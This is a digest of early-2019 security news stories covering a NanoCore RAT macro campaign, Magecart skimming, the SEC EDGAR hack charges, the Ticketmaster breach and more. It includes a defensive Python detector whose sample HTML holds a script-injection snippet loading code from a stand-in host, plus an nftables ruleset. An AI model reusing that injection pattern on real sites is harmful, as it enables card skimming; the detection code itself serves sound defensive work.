A malicious MS Word document, titled “eml_-_PO20180921.doc,” has been found in the wild, and according to researchers at Fortinet's FortiGuard Labs, the document contains auto-executable malicious VBA code.
Victims who receive and open the document are prompted with a security warning that macros have been disabled. If the user then clicks on “Enable Content,” the NanoCore remote access Trojan (RAT) is installed on the victim’s Windows system.
According to FortiGuard Labs, the NanoCore RAT was developed in the .Net framework back in 2013. Despite its continued use, the author was convicted by the FBI and sentenced to nearly three years in prison. Researchers captured a sample of this latest version (126.96.36.199), which uses NanoCore to execute malicious behavior.
Spreading through phishing campaigns that dupe victims into opening the document, the malware is downloaded from www.wwpdubai.com. Once executed, the VBA code downloads and saves an EXE file from the URL.
“I loaded CUVJN.exe with the .Net debugger dnSpy. Tracing from its main function, we can see that it loads numerous data blocks from its resource section, and then puts them together and decrypts them,” wrote researcher Xiaopeng Zhang.
In order to trace the main functions, researchers loaded CUVJN.exe with the .Net debugger dnSpy and found that it loads, puts together and then decrypts multiple data blocks from its resource section in order to get to a new PE file.
“According to my analysis, the decrypted .Net program is a daemon process. Let’s continue to trace it from its main() function. At first, it creates a Mutex and checks if the process already exists to ensure only one process of this program is running. Next, it checks if Avast is running on the victim’s system by detecting whether the “snxhk.dll” module is loaded or not. If so, it keeps waiting until it has been unloaded. Avast is an AntiVirus software, and “snxhk.dll” is one of its modules,” Zhang wrote.
Unfortunately, the decrypted .Net program runs as a daemon process, which Zhang said he was not able to kill because it has a “ProtectMe” class, though he does provide steps for removing the malware.
Players who love to indulge in online battle should heed caution when playing Fortnite, according to researchers at Check Point who have disclosed vulnerabilities that could give a malicious actor access to a user’s account and their V-Bucks.
In addition to gaining full access to a user’s account, an attacker who exploited the vulnerability – which has now been fixed – could have eavesdropped on a player’s in-game conversations, potentially also picking up any sounds in the background where the game was being played, researchers said.
According to today’s press release, an attacker could have stolen login credentials by exploiting three flaws found in the web infrastructure of Epic Games, specifically in compromised sub-domains through which the malicious actor could intercept authentication tokens.
The attack, which reportedly could be executed in a single click, would let an attacker purchase virtual in-game currency with the victim’s payment card details; that currency could then be sold for real money outside the game.
“Researchers were able to demonstrate the token-based authentication process used in conjunction with Single Sign-On (SSO) systems such as Facebook, Google and Xbox” and reported the vulnerability to Epic Games, the press release stated.
“Fortnite is one of the most popular games played mainly by kids. These flaws provided the ability for a massive invasion of privacy,” said Oded Vanunu, head of products vulnerability research for Check Point in a press release.
“Together with the vulnerabilities we recently found in the platforms used by drone manufacturer DJI, these show how susceptible cloud applications are to attacks and breaches. These platforms are being increasingly targeted by hackers because of the huge amounts of sensitive customer data they hold. Enforcing two-factor authentication could mitigate this account takeover vulnerability,” continued Vanunu.
Still, Check Point advised players to remain vigilant and use discretion when sharing information online and cautioned that because of the increasing popularity and success of phishing campaigns, players should keep in mind that there are many dubious and dangerous links that should not be trusted.
Two security researchers working independently on different projects have discovered multiple vulnerabilities that affect multiple web hosting platforms, including the popular Bluehost, as well as Amadeus, the online reservation system used by several different airlines.
According to independent security researcher Paulos Yibelo, Bluehost, a popular web hosting platform, was riddled with vulnerabilities, including one that would allow complete account takeover.
Rated as having a high severity, the vulnerabilities grant attackers access to personally identifiable information, partial payment information and tokens that grant access to sites like WordPress, Website Planet wrote. In addition to those bugs discovered in BlueHost, Yibelo also reported several bugs in other web hosting platforms, including Dreamhost, HostGator, OVH, and iPage.
“This should serve as a warning call for those companies authenticating customers online with legacy technology. Today, account takeover is not a hard attack to deploy, and the consequences can be devastating with bad actors stealing money and products,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.
In related news, security researcher Noam Rotem, who was working with Safety Detective research lab, discovered a major vulnerability in Amadeus, an online booking system used by nearly half (44%) of all airlines worldwide, including United Airlines, Lufthansa, Air Canada, and many more, according to a January 15 blog post.
After receiving a message to check the passenger name record (PNR), the researchers were able to view any PNR and access customer data.
“With the PNR and customer name at our disposal, we were able to log into ELAL’s customer portal and make changes, claim frequent flyer miles to a personal account, assign seats and meals, and update the customer’s email and phone number, which could then be used to cancel/change flight reservation via customer service,” the researchers wrote.
A malicious actor would need to have a working knowledge of the PNR code in order to exploit the vulnerability, which has since been fixed.
Researchers have uncovered a twelfth Magecart group using tried-and-tested methods to disseminate digital skimming code by infecting the supply chain.
RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.
This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code.
This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”
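The injection pattern described above (a small inline snippet carrying a base64-encoded resource URL that is decoded at runtime and turned into a script tag) can be hunted for in page HTML. The following is an added defender-side example written for this article, not code from RiskIQ or from the campaign: it collects inline scripts, decodes base64 literals that yield URLs, and reports any host the site owner does not expect to load script from. The sample HTML, the stager URL and the allowlist are constructed for the demo and are not real indicators.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample values for the demo; not real indicators from any campaign.
STAGER_URL = "https://ads-stager.example/loader.js"
ENCODED_URL = base64.b64encode(STAGER_URL.encode()).decode()

SAMPLE_HTML = f"""<html><head>
<script src="https://cdn.example/lib.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>
<script>var s=document.createElement('script');s.src=atob('{ENCODED_URL}');document.head.appendChild(s);</script>
</body></html>"""

# Hosts the site owner expects to serve script (assumed allowlist for the demo).
ALLOWED_HOSTS = {"cdn.example"}


class InlineScriptCollector(HTMLParser):
    """Collect the text of every inline <script> element (those without src=)."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


# A run of base64 alphabet characters long enough to hold a URL.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_candidates(script_text):
    """Return every base64 literal in the script that decodes to a URL."""
    urls = []
    for match in B64_LITERAL.finditer(script_text):
        try:
            decoded = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore
        if decoded.startswith(("http://", "https://", "//")):
            urls.append(decoded)
    return urls


def find_decoded_script_urls(html):
    """URLs hidden in inline scripts that decode data at runtime or create script elements."""
    collector = InlineScriptCollector()
    collector.feed(html)
    found = []
    for script in collector.scripts:
        if "atob(" not in script and "createElement" not in script:
            continue  # plain inline script, no runtime decoding or injection
        found.extend(decode_candidates(script))
    return found


def unexpected_hosts(html, allowed=ALLOWED_HOSTS):
    """Hosts referenced by decoded URLs that are not on the allowlist, for review."""
    hosts = set()
    for url in find_decoded_script_urls(html):
        if url.startswith("//"):
            url = "https:" + url  # protocol-relative URL
        hosts.add(urlparse(url).hostname)
    return sorted(hosts - allowed)


if __name__ == "__main__":
    for host in unexpected_hosts(SAMPLE_HTML):
        print("review: inline script injects code from unexpected host", host)
```

Run this against the rendered HTML of a checkout page (for example, saved from a headless browser after all ad tags have loaded), and treat any host outside the allowlist as a lead for investigation rather than proof of compromise, since legitimate tag managers also build script URLs at runtime. A Content-Security-Policy with a strict script-src allowlist removes the need to chase decoded URLs after the fact.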
RiskIQ warned that there’s the potential for thousands more businesses to be affected, given they all run the compromised ad tag.
This is the latest in a long line of Magecart activity which can be split roughly into two camps: attacks targeting firms’ websites directly, like the ones affecting BA and Newegg, and ones targeting suppliers.
Alongside this latest campaign, Magecart groups have been behind attacks on the developer Inbenta Technologies which led to Ticketmaster customers having their card data stolen.
Just this week it emerged that high street banks in the UK have been sending out new cards to potentially affected customers, months after the incident was first reported.
Two Ukrainian nationals have been charged with hacking into the Securities and Exchange Commission (SEC) and stealing sensitive information for use in insider trading.
Artem Radchenko, 27, and Oleksandr Ieremenko, 26, both from Kiev, were charged with 16 counts including securities fraud conspiracy, wire fraud conspiracy, computer fraud conspiracy, wire fraud and computer fraud.
They’re alleged to have targeted the SEC’s Electronic Data Gathering, Analysis and Retrieval (EDGAR) system, which stores documents related to company disclosures including test filings made before announcements go public.
These filings often contain information similar to that of the official final filing, meaning the two alleged hackers could get their hands on sensitive info before it went public to gain an advantage on the markets.
They’re alleged to have used a variety of tactics to obtain unauthorized access to the EDGAR servers, including directory traversal, phishing and malware. They’re then said to have copied the information to a server in Lithuania.
The Ukrainians recruited traders to their scheme, who used the stolen information to make over $4m in profits, according to the Department of Justice.
For example, they’re alleged to have bought up $2.4m worth of shares in a public company based on information contained in a stolen test filing about its upcoming financials. They then sold these shares for a $270,000 profit over the next day after the company announced it expected record earnings for 2016.
“The defendants allegedly orchestrated sophisticated computer intrusions to steal non-public information from the SEC, compromising the integrity of the market and depriving honest investors of a level playing field,” said assistant attorney general Brian Benczkowski. “The Department of Justice will aggressively pursue and prosecute those who attack our financial markets and seek to profit unfairly, no matter where such offenders reside.”
The charges carry a potential maximum sentence of 25 years behind bars and $500,000 fine, or twice the gain or loss from the relevant offenses.
Ieremenko has been in trouble before, charged in 2015 for his part in an international conspiracy to hack and steal non-public sensitive market information from three newswire organizations, using the same techniques.
A total of 10 defendants have been charged as part of the latest conspiracy.
The UK’s National Cyber Security Centre (NCSC) has urged organizations still on Windows 7 to plan now for the end of extended support in a year’s time.
The GCHQ arm reminded IT managers that the operating system will no longer receive free updates from January 14 2020.
That will mean any machines still running then could be exposed to a greater risk of malware, and potentially unreliable systems.
The NCSC drew parallels with the end-of-support for Windows XP in 2014.
“It wasn’t long after that before exploitation of the final version of the platform became fairly widespread. Malware can spread much more easily on obsolete platforms because, without security updates, known vulnerabilities will remain unpatched. As a result, it’s crucial to move away from them as quickly as possible,” it explained.
“We know there are costs involved in keeping up to date. However, doing so is one of the most effective ways of keeping your networks and devices secure - this is why planning your upgrades far in advance is especially important.”
For organizations unable for any reason to migrate swiftly to Windows 10 — for example if there are compatibility issues with legacy software — the NCSC has listed a few key short-term recommendations.
These include preventing access to untrusted services and removable media, converting systems to thin clients, removing access for remote workers and applying anti-malware and intrusion detection tools.
For those businesses keen to remain on Windows 7 beyond January 14 2020, Microsoft is also offering Extended Security Updates (ESUs), which will be priced per device and increase in cost every year until January 2023.
Another option is to buy the Windows Virtual Desktop service, virtualizing Windows 7 on Azure VMs. This option comes with free ESUs but will also be available only for three years.
Despite the burgeoning IoT market, organizations made limited progress on IoT security in 2018, according to a new report from Gemalto. Though there is evidence of incremental improvements, security measures are being outpaced by the rapid growth of IoT, which is on track to hit 20 billion devices by 2023.
The survey queried 950 IT and business decision-makers with awareness of IoT in their organization in 2018. Of those, only 48% of companies said that they have the ability to detect whether their IoT devices have suffered a breach; however, 90% of respondents believe that security is a major concern for their customers.
According to the report, more than half (54%) of consumers fear that their privacy may be compromised by IoT devices, yet only 14% of the survey participants see protecting customer privacy by securing IoT devices as an ethical responsibility.
“Given the increase in the number of IoT-enabled devices, it’s extremely worrying to see that businesses still can’t detect if they have been breached,” said Jason Hart, CTO, data protection at Gemalto, in a press release. “With no consistent regulation guiding the industry, it’s no surprise the threats – and, in turn, vulnerability of businesses – are increasing. This will only continue unless governments step in now to help industry avoid losing control.”
More than a third (38%) of participants said they experience privacy challenges associated with collecting large amounts of IoT data. Still, more organizations have started using passwords to protect IoT devices. While 63% of organizations said they used passwords in 2017, the number of positive responses rose to 66% in 2018.
“Businesses are clearly feeling the pressure of protecting the growing amount of data they collect and store,” Hart said. “But while it’s positive they are attempting to address that by investing in more security, such as blockchain, they need direct guidance to ensure they’re not leaving themselves exposed. In order to get this, businesses need to be putting more pressure on the government to act, as it is them that will be hit if they suffer a breach.”
Another ransomware attack has made headlines with the city of Del Rio, Texas, announcing on January 10, 2019, that the servers at City Hall were disabled, according to a press release.
“The first step in addressing the issue, was for the City’s M.I.S. (Management Information Services) Department to isolate the ransomware which necessitated turning off the internet connection for all city departments and not allowing employees to log into the system. Due to this, transactions at City Hall are being done manually with paper.”
As has been the alternative method of communication for many organizations that have been impacted by cyber-attacks, Del Rio turned to social media, using Facebook to inform citizens of alternative payment options available to them.
After reporting the attack to the FBI, Del Rio was referred to the Secret Service. “The City is diligently working on finding the best solution to resolve this situation and restore the system. We ask the public to be patient with us as we may be slower in processing requests at this time,” the press release said.
At the time of writing this, the website for the city of Del Rio was up and running, though there is no word on the full scope of the attack. Infosecurity has contacted the city, and this story will be updated with any response.
“The growing number of exploit kits and malware at their disposal is emboldening malicious actors to attack organizations with a rich trove of consumer data,” said Mike Bittner, digital security and operations manager at The Media Trust.
“Government organizations, in particular city governments, are prime targets; they not only process a lot of citizen and business data but are also less secure, as tighter budgets severely limit what IT updates they can carry out. Bad actors have no doubt put the 89,000 local governments across the country in their crosshairs. It is just a matter of time before many of these governments realize they’ve been hacked.”
As the US inches toward a full month of a government shutdown, concerns over the impact on national security and cybersecurity continue to mount, and according to security experts from Juniper Networks, Untangle and Vectra, the shutdown may affect government IT recruiting and hiring.
With the skills gap being one of the hurdles every company must clear in order to mature in their overall cybersecurity posture, most organizations are trying to get more creative when it comes to recruitment. The government, though, is in its 25th day of a shutdown.
“The biggest impact of the shutdown, in my opinion, is that furloughing cybersecurity analysts creates a vulnerability for government networks. As we all know, the top problem in security today is the shortage of trained cybersecurity professionals, and the cybersecurity skills shortage was already getting worse in 2018 with millions of unfilled cybersecurity jobs,” said Nick Bilogorskiy, cybersecurity strategist at Juniper Networks.
The problem is exacerbated because some staff are furloughed during the shutdown. As Infosecurity reported last week, attackers can potentially intensify their activity and exploit security gaps and vulnerabilities resulting from the shutdown. When considering the long-term ramifications, Bilogorskiy said it’s likely that the government will lose valuable cybersecurity talent to the private sector.
“During prior shutdowns, recruiting and hiring efforts have certainly been impacted, as these are not typically considered essential functions,” said Dave Mihelcic, federal chief technology and strategy officer for Juniper Networks and former chief technology officer of Defense Information Systems Agency (DISA).
“Perhaps the more significant challenge posed by these shutdowns was the lasting impressions they made on young IT professionals," Mihelcic continued. "Undoubtedly IT job seekers had a more negative view of federal employment due to the shutdown. Likewise the most talented IT professionals in federal service were left with lasting questions about their future that would cause some to seek outside opportunities.”
The problem isn't limited in scope, either. Yes, expired certificates are a problem, but collaboration between the public and private sector is critical to strong cyber-defense. "With only a skeleton crew at the helm, data sharing and rapid response can fall by the wayside, leaving our nation vulnerable to cyber threats and attacks. The longer the shutdown continues, the more opportunity there is for both private and state-sponsored attackers to take advantage of any possible lapses in oversight,” said Heather Paunet, vice president of product management at Untangle.
Government agencies have often lost potential talent to the salary battle with private industry, but the biggest concern of the government shutdown is that this type of instability would hamper the federal government’s ability to attract and retain good cybersecurity talent, according to Chris Morales, head of security analytics at Vectra.
“With the number of available roles in the private sector that pay with much more lucrative salaries and benefits, it’s going to just get harder for government agencies to compete. If anyone is in need of more automation and efficiency in security operations processes, it will be these federal agencies.”
Two major UK high street banks have started to send out replacement cards for some of their customers, nine months after one lender reported fraudulent activity to Ticketmaster.
Customers of NatWest and RBS have taken to social media to vent their frustration over the way the incident has been handled.
Some complained that this is the first they’ve heard of the breach, which Ticketmaster reported in June and is believed to have affected in the region of 40,000 UK customers.
Others wanted to know if the letter sent by their bank was genuine.
“During 2018 Ticketmaster announced that they suffered a data breach between September 2017 and June 2018, which included data for some of our customers. Because of this, we are replacing all customer debit and credit cards that may have been compromised by this breach,” explained a Twitter response to one such query by NatWest.
The banks claim they are issuing the replacement cards as a precaution, so there’s no confirmation that details were definitely accessed in the incident.
However, the lengthy delay in responding to the breach comes in stark contrast to banking start-up Monzo which requested Mastercard to issue replacement cards for all affected customers back in April last year.
In fact, the bank wrote in a blog post that it had initially contacted the ticketing giant to inform it of a potential breach, a warning that appeared to have gone unheeded for nearly two months.
Breaches are often first detected by banks as they’re able to analyze fraud patterns on customer cards to pinpoint a merchant they have in common.
The breach itself was the result of digital skimming code known as Magecart being seeded into software provided by a third-party developer Inbenta Technologies.
The latter claimed that Ticketmaster had implemented it incorrectly on its payments page.
“We were unaware of this, and would have advised against doing so had we known, as it presents a point of vulnerability,” it said at the time.
It’s unclear how many RBS and NatWest customers have experienced fraud as a result of the Ticketmaster breach, although card details from other Magecart breaches at BA and Newegg were spotted for sale on dark web sites just a week later.
This would seem to highlight the need for a speedy response from all parties in such cases, including the breached firm and relevant banks/card providers.
Many organizations may find they’re better off hiring pen testers and in-house security researchers directly than running bug bounty programs, according to new MIT research.
The New Solutions for Cybersecurity paper features a surprising analysis of bug bounty programs in the chapter, Fixing a Hole: The Labor Market for Bugs.
It studied 61 HackerOne bounty programs over 23 months — including those run for Twitter, Coinbase, Square and other big names — and one Facebook program over 45 months.
It claimed that, contrary to industry hype, organizations running these programs don’t benefit from a large pool of white hats probing their products. Instead, an elite few produce the biggest volume and highest quality of bug reports across multiple products, earning the biggest slice of available rewards.
It’s also claimed that even these elite “top 1%” ethical hackers can’t make a decent wage by Western standards.
The top seven participants in the Facebook program studied made just $34,255 per year from an average of 0.87 bugs per month, while from the HackerOne dataset it was estimated that they made just $16,544 from 1.17 bugs per month.
There are, of course, exceptions: last week we reported that one company has upped its maximum payout for iOS zero-day exploits to $2m. However, it appears that these programs offer more of a salary top-up to Western researchers than a main source of income.
Security research firm Trail of Bits claimed the findings proved that firms should reconsider their security strategies by hiring “boffins” directly as consultants instead of running bug bounty programs.
“The authors of Fixing a Hole argue that bug bounties should be designed to incentivize the elite. They say that making bounties invite-only lowers the operational cost of managing a tsunami of trivial, non-issue, and duplicate bugs. Only 4-5% of bugs from Google, Facebook, and GitHub’s public-facing bounty programs were eligible for payment,” it argued in a blog post.
“According to the authors, a small number of bounty hunters are indispensable and hold significant power to shape the market for bug bounty programs. Based on this, hiring security consultants under terms and conditions that can be controlled seems more practical.”
That view is unsurprisingly not shared by HackerOne CEO, Marten Mickos, who said the MIT study is not representative.
“If it is based on HackerOne data, it is based only on a fragment of it. The hacker community is indeed power-law distributed,” he added in comments sent to Infosecurity.
“The top performers are orders of magnitude more productive than newcomers. The beauty is that many newcomers rise very quickly in the ranks. Within this merit-based system, there is unlimited opportunity for one with skill and will."
Report co-author and CEO of Luta Security, Katie Moussouris, doubled down on the findings, claiming that independent researchers are “better off pen testing or living the good life of in-house research staff.”
“Orgs can't #bugbounty their way to secure, same as they can't pen test their way to secure,” she tweeted. “The myth of ‘many eyes’ is convenient, but untrue as proven in both open source & bounties. Skilled bug bounty hunters rarely make a good living by Western standards.”
The Polish government is reportedly considering a ban of the use of Huawei products by the public sector following the arrest of an employee of the firm on suspicion of espionage.
Country sales director, Wang Weijing, was arrested on Friday along with a former Polish official who was apparently responsible for issuing security certificates for government IT equipment.
Huawei has sought to distance itself from the spying allegations by sacking Wang. The firm has said in a statement that the individual had brought the Shenzhen giant into disrepute, but that at the same time his alleged actions “have no relation to the company.”
With national security concerns over Chinese firms growing in the West, Warsaw could be inclined to join others in cooling its relationship with the world’s biggest telecoms equipment maker.
A senior government official told Reuters it was considering a public sector ban on Huawei alongside possible legislation which could allow restrictions to be placed on firms posing a national security threat.
Cybersecurity minister, Karol Okonski, told the news site: “We will analyze whether ... our decision can include an end to the use ... of Huawei products.”
“We do not have the legal means to force private companies or citizens to stop using any IT company’s products,” he added. “It cannot be ruled out that we will consider legislative changes that would allow such a move.”
Although the firm has repeatedly hit back at claims it is a security risk, stating it is a victim of wider geopolitical tensions, the US and Australia have effectively banned its equipment from their 5G networks while New Zealand and Canada are mooting the same.
Japan has said it will prevent the firm from competing for government contracts.
In the UK, the firm has pledged $2bn to allay recently aired security concerns about vulnerabilities in its products, although its equipment will still be used in BT’s 5G edge networks. There’s also the possibility that the government will go further.
“We need to decide the extent to which we are going to be comfortable with Chinese ownership of these technologies and these platforms in an environment where some of our allies have taken a very definite position,” MI6 chief Alex Younger has said.
Three different vulnerabilities in the Schneider Electric EVlink Parking electric vehicle charging station, which could have allowed an attacker to halt the charging process, have been patched, according to Positive Technologies.
Researchers discovered the vulnerabilities, CVE-2018-7800, CVE-2018-7801 and CVE-2018-7802, in charging stations used in parking environments in several countries, including at offices, hotels, supermarkets, fleets and municipalities. The vulnerabilities reportedly affect EVLink Parking v3.2.0-12_v1 and earlier.
“Schneider Electric products are widely used in countries all over the world where the electric vehicle industry is developing. Exploitation of these vulnerabilities may lead to serious consequences,” said Paolo Emiliani, industry and SCADA research analyst at Positive Technologies, in a press release. “Attackers can actually block electric car charging and cause serious damage to the energy industry.”
According to today's news post, if exploited, the vulnerabilities would enable cyber-criminals to stop the charging process for vehicles plugged into the affected stations, as well as unlock and steal the charging cables.
Specifically, CVE-2018-7800 and CVE-2018-7802 gave attackers privileged access to the charging station so that a hacker could “stop the charging process, switch the device to the reservation mode, which would render it inaccessible to any customer until reservation mode is turned off, and even unlock the cable during the charging by manipulating the socket locking hatch, meaning attackers could walk away with the cable.”
In addition, exploitation of the second vulnerability enabled access to the web interface, where an attacker could directly manage the operating system and make changes to files and configurations or add new users or back doors.
Schneider stated that customers can set up a firewall to block remote/external access except by authorized users as a risk mitigation strategy and recommended several cybersecurity best practices, including locating control and safety system networks and remote devices behind firewalls, and keeping those isolated from the business network.
“Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices,” the security notification stated.
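The network-segmentation advice above translates into a short packet-filter policy. The following nftables ruleset is an added illustration written for this article, not Schneider Electric’s own configuration; the address ranges for the charging-station management network (10.10.20.0/24), the VPN client pool (10.99.0.0/24) and the business LAN (10.10.10.0/24) are assumed placeholders, and the web-interface ports are assumed to be 80 and 443.

```nftables
# Added example, not vendor configuration. Assumed addressing:
#   charging-station management network  10.10.20.0/24
#   VPN client pool (authorized operators) 10.99.0.0/24
#   business LAN                          10.10.10.0/24
table inet evlink_edge {
    chain forward {
        type filter hook forward priority 0; policy drop;

        # Replies to sessions the stations themselves opened (e.g. updates) may return
        ct state established,related accept

        # Only VPN-terminated operators may reach the station web interface
        ip saddr 10.99.0.0/24 ip daddr 10.10.20.0/24 tcp dport { 80, 443 } accept

        # Business LAN and anything else hitting the station network is logged and dropped;
        # the log prefix gives the SOC a simple detection hook for unexpected access attempts
        ip saddr 10.10.10.0/24 ip daddr 10.10.20.0/24 log prefix "evlink-denied-lan " drop
        ip daddr 10.10.20.0/24 log prefix "evlink-denied " drop
    }
}
```

The default-drop forward policy is what enforces “not accessible from the Internet”; the single accept rule scoped to the VPN pool is the “authorized users only” condition, and the advisory’s caveat that a VPN is only as secure as the connected devices is why that pool should be kept small and its client endpoints patched.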
After news that a bug in its software resulted in a data breach, Singapore Airlines (SIA) has today issued a warning on Facebook, alerting customers to be wary of scams and phishing sites promising free airline tickets.
In what the company called a fraudulent online survey being dispersed via WhatsApp, scammers ask users if they have ever traveled with the airline and make the specious claim that SIA is offering free tickets in celebration of its anniversary.
In truth the survey is a scam attempting to trick SIA customers into giving their personal and credit card information. “If a recipient answers the survey questions and clicks on ... 'Claim Tickets' or 'WhatsApp,' the user will be redirected to a non-SIA website that is designed to trick the recipients into filling in their personal and credit card information. This fraudulent website is only accessible via mobile device browsers. They are shared and forwarded via WhatsApp,” SIA wrote.
In addition, the company is using social media to reach its customers as well. “It has come to our attention that there is a website that claims to be from Singapore Airlines, offering free air tickets as prizes, before proceeding to request personal data,” Singapore Airlines wrote on Facebook.
“We have reported the site to be taken down and would like to advise customers to exercise discretion when revealing personal data to unverified sources. These websites, emails and calls should be verified if in doubt. Please send us details on our social media channels or via this link http://singaporeair.com/en_UK/feedback-enquiry/.
“We would also like to advise customers to be cautious of social media posts and phishing websites that appear similar to our official website singaporeair.com. Thank you.”
Cyber-criminals continue to prey on the naïveté and trust of end users. Already in 2019, Infosecurity has reported on several scams, among them 60% of UK consumers leaving themselves vulnerable to New Year’s resolution online scams and the return of the WhatsApp Gold scam.
Increasingly, though, users are realizing that where online and mobile advertising is concerned, nothing is ever really free. One Facebook user warned, “If it sounds/looks too good to be true, it usually is! Always delete these things after checking official websites!”
Crypto-mining malware has again topped the threat index, with Coinhive holding the number one malware spot for the 13th consecutive month, according to the Global Threat Index for December 2018, published by Check Point.
The threat index looks at the most common active malware variants and trends as cyber criminals evolve toward crypto-mining and multipurpose malware.
A second-stage downloader, SmokeLoader, first identified back in 2011, jumped to ninth place on the December top-10 list. “After a surge of activity in the Ukraine and Japan, its global impact grew by 20. SmokeLoader is mainly used to load other malware, such as Trickbot Banker, AZORult Infostealer and Panda Banker,” according to a press release.
“December’s report saw SmokeLoader appearing in the top 10 for the first time. Its sudden surge in prevalence reinforces the growing trend towards damaging, multipurpose malware in the Global Threat Index, with the top 10 divided equally between crypto-miners and malware that uses multiple methods to distribute numerous threats,” said Maya Horowitz, threat intelligence and research group manager at Check Point.
“The diversity of the malware in the Index means that it is critical that enterprises employ a multilayered cybersecurity strategy that protects against both established malware families and brand new threats.”
For mobile malware, Triada, a modular backdoor for Android that grants super-user privileges to downloaded malware, ranked number one.
“Check Point researchers also analyzed the most exploited cyber vulnerabilities. Holding on to first place was CVE-2017-7269, whose global impact also rose slightly to 49%, compared to 47% in November. In second place was OpenSSL TLS DTLS Heartbeat Information Disclosure, with a global impact of 42% closely followed by PHPMyAdmin Misconfiguration Code Injection with an impact of 41%,” the press release stated.
Not surprisingly, the report also reflected a rise in banking Trojans, particularly in the data-stealing Trojan, Ramnit, which ranked eighth on the top-10 list.
The British Security Industry Association (BSIA) has published a summary of current guidelines to minimize the exposure to digital sabotage of network connected equipment, software and systems used in electronic security.
The 335 Cyber Secure It - Best Practice Guidelines for Connected Security Systems document, designed by the Cyber Security Product Assurance Group (CySPAG) and leading industry experts, is “intended to be used as a guide by any stakeholder (designers, manufacturers, installers, maintainers, service providers and users) in the supply chain regarding connected security devices/services.”
The guidelines are based on international industry best practice and refer to recognized international guidance and standards that “will assist the supply chain in their duty of care to other network users, particularly with respect to protecting the integrity of existing cybersecurity countermeasures already in place or the implementation of such countermeasures in new solutions.”
Steve Lampett, technical services manager, BSIA, said: “We think that Cyber secure it – Best Practice Guidelines for Connected Security Systems will become an invaluable guide for our industry practitioners and stakeholders alike as technology continues to evolve and the internet is used to provide a better end user experience.
“This will enable us to better serve our industry consumers by providing professional, safe and secure internet enabled security solutions.”
The healthcare sector continues to be the target of cyberattacks, with Managed Health Services (MHS) of Indiana Health Plan announcing recently that a third-party data breach potentially exposed up to 31,000 patients' personal data in one of two security incidents the company has disclosed in the past month.
The organization reportedly manages Indiana's Hoosier Healthwise and Hoosier Care Connect Medicaid programs. “MHS learned from its vendor, LCP Transportation, that unauthorized persons had gained access to some of their employees’ email accounts. This access took place sometime between July 30 and September 7, 2018,” the news release stated.
On October 29, 2018, MHS launched an investigation after learning that protected health information, including names, insurance ID numbers, addresses, dates of birth, dates of service and descriptions of medical conditions, had possibly been disclosed.
“The incident was caused by a phishing attack on the vendor’s systems. The vendor immediately took steps to secure the email accounts and began an investigation, including hiring a computer forensic firm to assist. The investigation concluded that some of your information may have been in the email accounts and that could be accessed. There is no evidence that your information has been misused.”
“Phishing attacks are a favorite for malicious adversaries as one of the most successful methods for stealing and exposing data. LCP Transportation, a third-party vendor of Managed Health Services, recently felt the impact of how a phishing attack targeted at their employees can trickle down the chain – ultimately breaching roughly 31,000 patient records held by their business associate,” said Fred Kneip, CEO, CyberGRX.
“To combat this, healthcare providers require a cyber solution that moves beyond previous, static approaches to third-party cyber-risk management that is unable to scale with their growing ecosystems.”
According to Becker’s Hospital Review, this is the fourth data breach impacting health plans disclosed in the past month. Yet another example of the ways in which individuals and their personal data are at the mercy of insecure organizations, the MHS incident follows a reported data breach at Humana and two separate security incident announcements at BCBS of Michigan.
For the second time in less than two months, the New York Times has reported that a progressive group of Democrats allegedly leveraged social media sites in a secret project intended to spread false information and sway the 2017 Senate race in Alabama.
According to the New York Times, “The 'Dry Alabama' campaign, not previously reported, was the stealth creation of progressive Democrats who were out to defeat Mr. Moore – the second such secret effort to be unmasked.”
The New York Times first reported in December 2018 that a technologically savvy group of Alabama Democrats had attempted to mimic tactics used by the Russians who meddled in the 2016 presidential campaign, according to one of the group's internal reports.
According to The Hill, Matt Osborne, a progressive activist who worked on the Dry Alabama campaign, said Democrats had no choice but to use disinformation if they wanted to level the playing field with Republicans. “If you don’t do it, you’re fighting with one hand tied behind your back,” Osborne reportedly said. “You have a moral imperative to do this – to do whatever it takes.”
The reality is that this was the intentional creation of fake news. "It is akin to having a digital billboard or TV ad with incorrect facts," said Chris Morales, head of security analytics at Vectra. "Since we have been successful using AI to detect attacker behaviors in real time, someone should ask a team of data scientists to find a way to use AI to detect political misinformation, since there seems to be more than an average person can sort through.”
Jonathon Morgan, reportedly a participant in the Alabama project, was chief executive of the small cybersecurity firm New Knowledge.
“First of all, I find it abhorrent that a firm would use 'cybersecurity' as part of its tagline if in fact they were conducting offensive maneuvers to sow disinformation,” said Paul Innella, CEO of Washington DC-based cybersecurity firm TDI.
“Cybersecurity professionals have an ethics code we follow, one which is endorsed when obtaining a number of certifications in our space. While it’s not the Hippocratic Oath, we still hold ourselves to a high standard – cybersecurity is defensive at its core. This is a slippery slope of the highest order if we are going to start using a field whose reputation is built on trust to now pivot to a field of propagating mistrust.”
